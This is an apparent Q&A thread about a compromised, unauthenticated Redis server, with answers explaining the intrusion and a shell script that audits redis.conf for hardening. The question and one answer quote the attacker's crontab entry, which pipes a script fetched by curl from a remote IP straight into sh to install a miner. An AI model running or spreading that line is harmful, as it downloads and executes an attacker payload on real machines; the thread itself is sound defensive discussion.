2

When I ran keys * to get all pairs, one of the keys was named

crackit

Then I used the command below to get its value

get crackit

It shows the URL below, which looks suspicious.

/usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh.

A Google search shows a Chinese-language forum at

https://www.v2ex.com/t/373529 (I don't understand the language of this site)

I thought there was some intrusion. I immediately deleted all the keys. I have no idea what happened around my Redis.

SuperKrish
  • 177
  • 5

2 Answers

3

The forum at the URL given by the OP mentions that the developer's cloud-server Redis had been compromised and an entry had been added to the crontab, i.e.

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

The rest of the commenters mentioned that this is a possible hack that installs Bitcoin miners on the system.

I agree with @Itamar Haber: you must redeploy your server from scratch. A simple application cleanup is not enough.

mootmoot
  • 2,387
  • 10
  • 16
2

Your server is accessible to the world and the Redis process is not protected by a password. This allows a cracker to try to exploit Redis to gain access to your system.

My recommendations:

  1. Burn the server
  2. Reinstall, and configure it with a password at the very least.
Itamar Haber
  • 136
  • 3
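To make "configure with a password at the very least" concrete, here is an added example (not from the answer above or from the Redis project) that audits a redis.conf for the two weaknesses the answer names, a listener reachable from the world and no requirepass, and goes slightly beyond them by also checking protected-mode (available since Redis 3.2) and whether the CONFIG command has been renamed, both standard Redis hardening settings. The weak and hardened configuration texts are constructed for this example; the function names and the password placeholder are assumptions.

```shell
#!/bin/sh
# Added example (not from the original answer): audit a redis.conf for the
# exposure described above and show the corresponding hardened settings.

# Effective value of a directive (Redis uses the last occurrence); empty if unset.
# Commented-out lines such as "# bind 127.0.0.1" are ignored, as Redis ignores them.
# Usage: conf_get <redis.conf> <directive>
conf_get() {
    grep -E "^[[:space:]]*$2[[:space:]]" "$1" | tail -n 1 | sed -E "s/^[[:space:]]*$2[[:space:]]+//"
}

# Print one finding per line. Usage: audit_redis_conf <redis.conf>
audit_redis_conf() {
    f="$1"
    bind=$(conf_get "$f" bind)
    if [ -z "$bind" ]; then
        echo "bind unset: Redis listens on every interface"
    else
        for addr in $bind; do
            case "$addr" in
                127.*|::1|-::1) ;;
                *) echo "bind $addr: reachable on a non-loopback address" ;;
            esac
        done
    fi
    if [ "$(conf_get "$f" protected-mode)" = "no" ]; then
        echo "protected-mode no: unauthenticated remote clients are accepted"
    fi
    pw=$(conf_get "$f" requirepass)
    if [ -z "$pw" ]; then
        echo "requirepass unset: no authentication at all"
    elif [ "${#pw}" -lt 32 ]; then
        echo "requirepass is short: AUTH can be brute-forced quickly"
    fi
    # CONFIG lets any connected client rewrite runtime settings, including
    # where the server writes files; renaming it keeps that away from clients.
    if ! grep -Eq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$f"; then
        echo "CONFIG command not renamed: any client can rewrite runtime settings"
    fi
    return 0
}

# Number of findings, for scripting.
count_findings() {
    audit_redis_conf "$1" | wc -l | tr -d ' '
}

# Constructed weak config: the state of the server in the question.
WEAK_CONF=$(mktemp)
cat > "$WEAK_CONF" <<'EOF'
port 6379
# bind 127.0.0.1
protected-mode no
daemonize yes
EOF

# Constructed hardened config. The requirepass value is a placeholder;
# generate your own, e.g. with: openssl rand -hex 32
HARDENED_CONF=$(mktemp)
cat > "$HARDENED_CONF" <<'EOF'
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass Qx7Lm2Rv9Tp4Wn8Ha1Yb6Zk3Cd5Fg0Je2Su4Vi7Ob
rename-command CONFIG ""
rename-command FLUSHALL ""
daemonize yes
EOF

# Demo: the weak config produces four findings, the hardened one none.
echo "weak config:";     audit_redis_conf "$WEAK_CONF"
echo "hardened config:"; audit_redis_conf "$HARDENED_CONF"
```

Binding to loopback is the setting that actually removes the exposure; requirepass and protected-mode are the backstops if the bind is ever widened again, and a renamed CONFIG limits what a client can do even after it has authenticated.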